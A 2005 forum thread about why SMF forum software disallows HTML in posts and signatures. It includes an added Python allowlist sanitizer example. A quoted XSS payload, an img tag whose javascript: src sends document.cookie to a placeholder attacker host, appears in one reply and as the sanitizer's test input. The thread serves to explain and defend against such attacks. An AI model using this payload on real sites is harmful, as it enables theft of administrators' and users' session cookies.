HTML Code in Posts and Signatures

Started by maufonseca, March 14, 2005, 06:57:50 PM

maufonseca

Is there a way to enable html code in Posts and Signatures?

[Unknown]

No... and if you like your administrator account's current password, you'll probably want to keep it that way.

-[Unknown]

Ben_S

Although there is a safe html option in Edit Features and Options, the tags are limited for the reasons [Unknown] pointed out.
Liverpool FC Forum with 14 million+ posts.

maufonseca

Quote from: [Unknown] on March 14, 2005, 07:18:39 PM
No... and if you like your administrator account's current password, you'll probably want to keep it that way.

-[Unknown]
What happens when you use HTML code?

[Unknown]


maufonseca

Ohh, I understand now. It's easier to hack your site.

Spamiam

I very much understand disallowing java and applets, but I fail to see how the vast majority of html tags pose any threat. Pretty much all boards have liberal html functions built in, obviously sans things like java and applets.

This is the only disappointment I've had with this package so far, as have my members.

At least a package for trusted members would be appropriate. Many of my members have been html authors for about a century now. ;)

Gary

You can turn on and off basic HTML which allows images and links or as I call them Here Refs and Img Sarks.

Admin > Features and Options,

though I think it's not a good idea to turn it on.
Gary M. Gadsdon
Do NOT PM me unless I say so
War of the Simpsons
Bongo Comics Fan Forum
Youtube Let's Plays

^ YT is changing monetisation policy, help reach 1000 sub threshold.


Spamiam

 :D I *did* have it on - but it's so limited that nobody noticed!  ;D

Yonkey

Quote from: [Unknown] on March 15, 2005, 03:51:10 AM
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?'; + document.cookie;" />

-[Unknown]
Why can't SMF just str_replace($HTMLtext,"javascript:", "noJavaScriptAllowed...Punk:") ? :P

Ben_S

Because that would be easy to get round.
Liverpool FC Forum with 14 million+ posts.

Sheepy

Quote from: Spamiam on June 17, 2005, 07:37:22 PM
:D I *did* have it on - but it's so limited that nobody noticed!  ;D
I made a mod (More HTML Tags) that expands the tag list, but it's still limited to tags without attributes.  It includes things like list, header, abbreviation, center, etc.  More complicated tags will result in easier security breaches, which is a focus of 1.0.5... You need to compromise some of the time.

Yonkey

Quote from: Ben_S on June 30, 2005, 01:27:27 PM
Because that would be easy to get round.
How?  As far as I know, you can't run any javascript without the word "javascript:" in an href or src.  You could also disable use of the <script> tag.

[Unknown]

Because IE will try to parse completely invalid HTML.  It goes *out of its way* to try to make things that aren't otherwise insecure insecure.

For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved.  Firefox was completely unaffected.

It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.

-[Unknown]
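The two ideas in this part of the thread, Sheepy's "tags without attributes" list and the reason a str_replace of "javascript:" is not enough, both come down to the same design choice: an allowlist that decides by parsing, rather than a blacklist that rewrites substrings. The following is an added example (not SMF's code, nor the More HTML Tags mod) of a small allowlist sanitizer in Python's standard library: only listed tags survive, attributes are dropped except href/src/alt on a and img, and those URLs must parse to an http or https scheme or a site-relative path. The tag list, the scheme list and the sample post are assumptions constructed for the demo; the one hostile input is the img tag quoted earlier in this thread.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist policy (constructed for this example): anything not named here
# is escaped to text or dropped. Extend ALLOWED_SCHEMES deliberately
# (e.g. "mailto") rather than trying to enumerate bad schemes.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "ul", "ol", "li", "h3", "abbr", "center"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}  # only these tags keep any attributes
ALLOWED_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}


def safe_url(value):
    """Return the URL if its scheme is allowlisted (or it is site-relative), else None.
    The decision comes from parsing the scheme, not from searching for a banned
    substring, so there is no "clever spelling" for the rejected case to aim at."""
    # Raw whitespace/control characters never belong in an attribute URL; drop them
    # before parsing so the parsed scheme is the one the browser would see.
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        return cleaned if cleaned.startswith("/") else None  # site-relative paths only
    return cleaned if scheme in ALLOWED_SCHEMES else None


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []  # tags we actually emitted, so no orphan closing tags appear

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS and tag not in ALLOWED_ATTRS:
            return False  # unknown tag (script, object, embed, ...): dropped entirely
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # style=, on*= and everything else never survive
            if name in ("href", "src"):
                value = safe_url(value or "")
                if value is None:
                    return False  # bad URL: drop the whole link/image, do not "fix" it
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.stack.append(tag)
        return True

    def handle_startendtag(self, tag, attrs):
        # <b/> style: open, then close immediately if we emitted it
        if self.handle_starttag(tag, attrs) and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag not in self.stack:
            return  # closing tag for something we never emitted
        while self.stack:
            top = self.stack.pop()
            self.out.append("</%s>" % top)
            if top == tag:
                break

    def handle_data(self, data):
        # Text, including the body of a dropped <script>, is always escaped.
        self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()  # flush buffered text
        while self.stack:  # close anything the post left open
            self.out.append("</%s>" % self.stack.pop())
        return "".join(self.out)


def sanitize(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()


# Constructed sample post: benign markup mixed with the img tag quoted in this thread.
CONSTRUCTED_POST = (
    '<p>Hello <b>world</b> <a href="http://example.com/">link</a> '
    '<img src="javascript:\'http://www.hacker.com/look_for_admin_cookie.php?\'; + document.cookie;" /> '
    '<script>alert(1)</script><b onmouseover="x()">bold</b> 1 &lt; 2</p>'
)

if __name__ == "__main__":
    print(sanitize(CONSTRUCTED_POST))
```

The behaviour worth noticing is that a rejected URL removes the element rather than rewriting the attribute: the output never contains a "cleaned" version of input the filter did not understand, which is exactly what a substring replacement produces and what a forgiving parser like the IE engine described above can then reinterpret. A real deployment would also want the BBC-to-HTML step to go through the same URL check, since that was the 1.0.4 path mentioned in the thread.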

Elijah Bliss

Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML.  It goes *out of its way* to try to make things that aren't otherwise insecure insecure.

For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved.  Firefox was completely unaffected.

It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.

-[Unknown]

Wow.

On a side note, is there a way to disallow Flash in signatures?

[Unknown]

Just in signatures?

.signature embed, .signature object
{
   display: none;
}

-[Unknown]

Yonkey

Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML.  It goes *out of its way* to try to make things that aren't otherwise insecure insecure.

Yikes. :o It must be because back when IE 4/5 was being developed, they wanted a browser that would try to recover from HTML tag errors as opposed to rejecting them completely and barfing up a page (or crashing :P).  As a result, you get IE trying to parse anything, leading to obvious security holes. :-\

Anyway, personally I don't like using html in my forum and almost everything you could ever want to do visually is already possible using BBC tags. :)

Elijah Bliss

Quote from: [Unknown] on June 30, 2005, 09:09:19 PM
Just in signatures?

.signature embed, .signature object
{
   display: none;
}

-[Unknown]

Excellent! thanks!
